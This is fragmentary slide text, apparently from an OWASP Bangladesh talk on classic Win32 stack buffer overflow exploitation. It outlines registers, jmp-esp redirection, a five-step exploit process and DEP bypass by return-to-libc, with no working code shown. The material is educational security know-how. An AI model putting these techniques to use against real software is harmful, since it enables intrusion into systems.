How to Troubleshoot Apps for the Modern Connected Worker
Sending a for ahuh. win32 exploit development old school
1. Sending A for Ahuh.
Win32 Exploit development old school
2. The OWASP Foundation
http://www.owasp.org
Nahidul Kibria
Co-Leader, OWASP Bangladesh,
Principal Software Engineer,
Orbitax Bangladesh Ltd.
Writing code for fun and food. And a
security enthusiastic
@nahidupa
3. Sending A for Ahuh.
Win32 Exploit development old school
WTHell this
guy talking
about?
15. X86 Registers
• EIP - Address of next instruction
• ESP - Address for the top of the stack
• EBP - Stack Base Address
• EAX/ECX/EDX - Holds variables and data
for the application
51. Find jmp to esp
We can control the EIP and ESP
Little Endian: Little and big endian refers
to those bytes that are the most
significant. In a little-endian system, the
least significant byte is stored first. x86
uses a little-endian architecture.
58. Step by step exploit
• Step 1 – Crashing the application:
• Step 2 – Determine the offsets:
• Step 3 – The pain begins, finding an
instruction that will take us back to the
stack:
• Step 4 – Writing venetian shellcode.
• Step 5-Putting it all together
68. Data Execution Prevention (DEP)
DEP was introduced in Windows XP Service Pack 2.
Basic idea is
Prevent an application or service from executing code from a
non-executable memory(-NX) region.
69. DEP is two types
hardware-enforced DEP for CPUs that can mark memory
pages as nonexecutable,
and software-enforced DEP with a limited prevention for
CPUs that do not have hardware support.
70. DEP can be bypass by “Return to libc”
Reference: http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf
We still overwrite the return address with one of a
function in libc, pass it the correct arguments and have that execute for us.
Since these functions do not reside on the stack, we can bypass the stack
protection and execute code.